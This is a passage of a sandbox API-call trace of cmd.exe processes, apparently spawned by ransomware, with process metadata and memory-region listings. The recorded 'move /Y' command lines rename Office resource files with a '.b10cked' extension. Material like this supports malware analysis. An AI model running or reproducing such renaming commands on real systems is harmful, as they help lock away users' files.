lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f80c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f804, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f804*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.735] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.736] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.736] _wcsicmp (_String1="SGRESD~1.TRX", _String2=".") returned 69 [0158.736] _wcsicmp (_String1="SGRESD~1.TRX", _String2="..") returned 69 [0158.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgresd~1.trx")) returned 0x2020 [0158.736] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.736] SetErrorMode (uMode=0x0) returned 0x0 [0158.736] SetErrorMode (uMode=0x1) returned 0x0 [0158.736] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", nBufferLength=0x104, lpBuffer=0x20f194, lpFilePart=0x20f17c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", lpFilePart=0x20f17c*="SGRESD~1.TRX") returned 0x3c [0158.736] SetErrorMode (uMode=0x0) returned 0x1 [0158.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.736] _wcsicmp (_String1="SGRESD~1.TRX", _String2=".") returned 69 [0158.736] _wcsicmp (_String1="SGRESD~1.TRX", _String2="..") returned 69 [0158.736] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgresd~1.trx")) returned 0x2020 [0158.737] SetErrorMode (uMode=0x0) returned 0x0 [0158.737] SetErrorMode (uMode=0x1) returned 0x0 [0158.737] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", nBufferLength=0x104, lpBuffer=0x20f610, lpFilePart=0x20f3a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", lpFilePart=0x20f3a8*="SGRESD~1.TRX") returned 0x3c [0158.737] SetErrorMode (uMode=0x0) returned 0x1 [0158.737] SetErrorMode (uMode=0x0) returned 0x0 [0158.737] SetErrorMode (uMode=0x1) returned 0x0 [0158.737] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20f818, lpFilePart=0x20f3a8 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked", lpFilePart=0x20f3a8*="SGRES.DLL.trx_dll.b10cked") returned 0x49 [0158.737] SetErrorMode (uMode=0x0) returned 0x1 [0158.737] SetLastError (dwErrCode=0x0) [0158.737] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgres.dll.trx_dll.b10cked")) returned 0xffffffff [0158.737] GetLastError () returned 0x2 [0158.737] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x20ed24, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ed24) returned 0x322128 [0158.737] FindNextFileW (in: hFindFile=0x322128, lpFindFileData=0x20ed24 | out: lpFindFileData=0x20ed24) returned 0 [0158.738] GetLastError () returned 0x12 [0158.738] FindClose (in: hFindFile=0x322128 | out: hFindFile=0x322128) returned 1 [0158.739] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x321cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321cb8) returned 0x322128 [0158.864] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x20efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x49 [0158.864] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x20efbc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll", lpFilePart=0x0) returned 0x41 [0158.864] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgres.dll.trx_dll")) returned 0x2020 [0158.864] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgres.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\sgres.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.865] FindClose (in: hFindFile=0x322128 | out: hFindFile=0x322128) returned 1 [0158.865] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x20ef70 | out: _Buffer=" 1") returned 9 [0158.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.865] GetFileType (hFile=0x7) returned 0x2 [0158.865] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.865] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x20eefc | out: lpMode=0x20eefc) returned 1 [0158.865] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.865] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef30 | out: lpConsoleScreenBufferInfo=0x20ef30) returned 1 [0158.865] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.866] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x20ef70 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.866] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x20ef54, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x20ef54*=0x1a) returned 1 [0158.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.866] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.866] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.866] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.866] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.866] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.866] SetConsoleInputExeNameW () returned 0x1 [0158.866] GetConsoleOutputCP () returned 0x1b5 [0158.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.866] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.867] exit (_Code=0) Process: id = "269" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ce0" os_pid = "0xf48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21967 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21968 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21969 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21970 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 21971 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21972 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21973 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21974 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21975 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 21976 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21977 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21978 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21979 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21980 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 21981 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 21982 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21983 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21984 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21985 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21986 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21987 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21988 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21989 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21990 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21991 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 21992 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21993 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21994 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21995 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21996 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21997 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21998 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 21999 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 22000 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 332 os_tid = 0x320 [0159.049] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fbe4 | out: lpSystemTimeAsFileTime=0x24fbe4*(dwLowDateTime=0x98bb1860, dwHighDateTime=0x1d440a9)) [0159.050] GetCurrentProcessId () returned 0xf48 [0159.050] GetCurrentThreadId () returned 0x320 [0159.050] GetTickCount () returned 0x30a2d [0159.050] QueryPerformanceCounter (in: lpPerformanceCount=0x24fbdc | out: lpPerformanceCount=0x24fbdc*=21583880855) returned 1 [0159.050] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0159.050] __set_app_type (_Type=0x1) [0159.050] __p__fmode () returned 0x76b331f4 [0159.050] __p__commode () returned 0x76b331fc [0159.050] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0159.050] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0159.051] GetCurrentThreadId () returned 0x320 [0159.051] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x320) returned 0x38 [0159.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0159.051] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0159.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0159.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0159.051] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fb74 | out: phkResult=0x24fb74*=0x0) returned 0x2 [0159.051] VirtualQuery (in: lpAddress=0x24fbab, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.051] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0159.051] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0159.051] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.051] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fb44, dwLength=0x1c | out: lpBuffer=0x24fb44*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0159.051] GetConsoleOutputCP () returned 0x1b5 [0159.051] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0159.051] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0159.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0159.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.052] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0159.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0159.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0159.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.052] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0159.052] _get_osfhandle (_FileHandle=0) returned 0x3 [0159.052] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0159.053] GetEnvironmentStringsW () returned 0x3f0210* [0159.053] FreeEnvironmentStringsW (penv=0x3f0210) returned 1 [0159.053] GetEnvironmentStringsW () returned 0x3f0210* [0159.053] FreeEnvironmentStringsW (penv=0x3f0210) returned 1 [0159.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eae4 | out: phkResult=0x24eae4*=0x40) returned 0x0 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0xa0, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x1, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x1, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x0, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x40, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.053] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x40, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x40, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.054] RegCloseKey (hKey=0x40) returned 0x0 [0159.054] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24eae4 | out: phkResult=0x24eae4*=0x40) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x40, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x1, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x1, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x0, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x9, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x4, lpData=0x24eaf0*=0x9, lpcbData=0x24eae8*=0x4) returned 0x0 [0159.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24eaec, lpData=0x24eaf0, lpcbData=0x24eae8*=0x1000 | out: lpType=0x24eaec*=0x0, lpData=0x24eaf0*=0x9, lpcbData=0x24eae8*=0x1000) returned 0x2 [0159.054] RegCloseKey (hKey=0x40) returned 0x0 [0159.054] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886381 [0159.054] srand (_Seed=0x5b886381) [0159.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\STINTL.DLL.trx_dll.b10cked\"" 